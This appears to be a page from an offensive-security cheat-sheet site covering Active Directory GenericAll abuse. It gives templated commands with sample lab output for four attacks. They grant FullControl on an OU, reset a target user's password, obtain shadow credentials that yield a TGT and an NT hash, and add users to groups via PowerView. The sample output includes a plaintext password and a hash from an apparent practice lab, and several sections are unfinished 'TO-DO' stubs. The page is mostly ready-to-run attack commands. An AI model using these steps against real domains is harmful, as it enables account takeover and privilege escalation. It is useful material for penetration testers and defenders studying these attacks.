TLDRBins TLDRBins / GenericAll

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Abuse #1: Change Target User Password

1. Add Full Control to Current User

sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal <USER> -target-dn 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' -inheritance -action write -rights FullControl -use-ldaps

Sample Output:
$ impacket-dacledit -k 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 -principal oorend -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' -inheritance -action write -rights FullControl -use-ldaps
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240923-015912.bak
[*] DACL modified successfully!

# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<USER>'

Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' 'oorend'
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

2. Change Password

bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'

Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 set password 'winrm_svc' 'Test1234'
[+] Password changed successfully!

Ref: bloodyAD

1. Import PowerView.ps1

. .\PowerView.ps1

Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Change Target User Password

$password = ConvertTo-SecureString <PASSWORD> -AsPlainText -Force 

Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString Test1234 -AsPlainText -Force

Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password

Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity superfume -AccountPassword $password

Abuse #2: Get Shadow Credential

1. Add Full Control to Current User

sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal <USER> -target-dn 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' -inheritance -action write -rights FullControl -use-ldaps

Sample Output:
$ impacket-dacledit -k 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 -principal oorend -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' -inheritance -action write -rights FullControl -use-ldaps
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240923-015912.bak
[*] DACL modified successfully!

bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<USER>'

Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' 'oorend'
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

2. Get Shadow Credential

sudo ntpdate -s <DC> && certipy-ad shadow auto -username <USER>@<DOMAIN> -password '<PASSWORD>' -k -account <TARGET_USER> -target <DC> -scheme ldap

Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && certipy-ad shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22fdb427-7028-72b8-bc39-8f4674c644dd'
[*] Adding Key Credential with device ID '22fdb427-7028-72b8-bc39-8f4674c644dd' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '22fdb427-7028-72b8-bc39-8f4674c644dd' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

FIX: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

# No really a fix, need to runas administrator
gpupdate /force

Sample Output:
*Evil-WinRM* PS C:\Users\Administrator\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

Abuse #3 : Add User to Group

1. Import PowerView

. .\PowerView.ps1

Sample Output:
TO-DO

2. Create a Cred Object (runas) [Optional]

$username = '<DOMAIN>\<USER>'

Sample Output:
TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force

Sample Output:
TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password

Sample Output:
TO-DO

2. Add User to Group

Add-DomainGroupMember -Identity <TARGET_GROUP> -Members <USER> -Credential $cred

Sample Output:
TO-DO

Abuse #4 : Add GenericAll to Target User over Organizational Unit (OU)

# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<TARGET_USER>'

Sample Output:
TO-DO